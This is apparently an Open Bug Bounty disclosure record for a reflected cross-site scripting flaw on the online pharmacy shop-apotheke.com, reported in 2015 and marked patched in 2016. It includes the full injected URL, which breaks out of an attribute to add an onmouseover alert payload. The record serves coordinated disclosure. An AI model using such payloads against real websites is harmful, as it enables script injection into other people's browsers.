shop-apotheke.com XSS vulnerability

2015-09-09T15:17:00
ID OBB:85396
Type openbugbounty
Reporter dim0k
Modified 2016-01-30T22:39:00

Description

Vulnerable URL:
http://www.shop-apotheke.com/arzneimittel/2933121/tuberculinum-gt-d-30-globuli.htm?q=" style=background:black; onmouseover=alert(String.fromCharCode(88,83,83,80,79,83,69,68)) "
Details:

Description| Value
---|---
Patched:| Yes, at 30.01.2016
Latest check for patch:| 30.01.2016 22:39 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 16683
Google Pagerank| 4
VIP website status:| Yes
Check shop-apotheke.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 9 September, 2015 15:17 GMT
Vulnerability existence verified and confirmed| 9 September, 2015 15:19 GMT
Vulnerability patched by the website owner| 30 January, 2016 22:39 GMT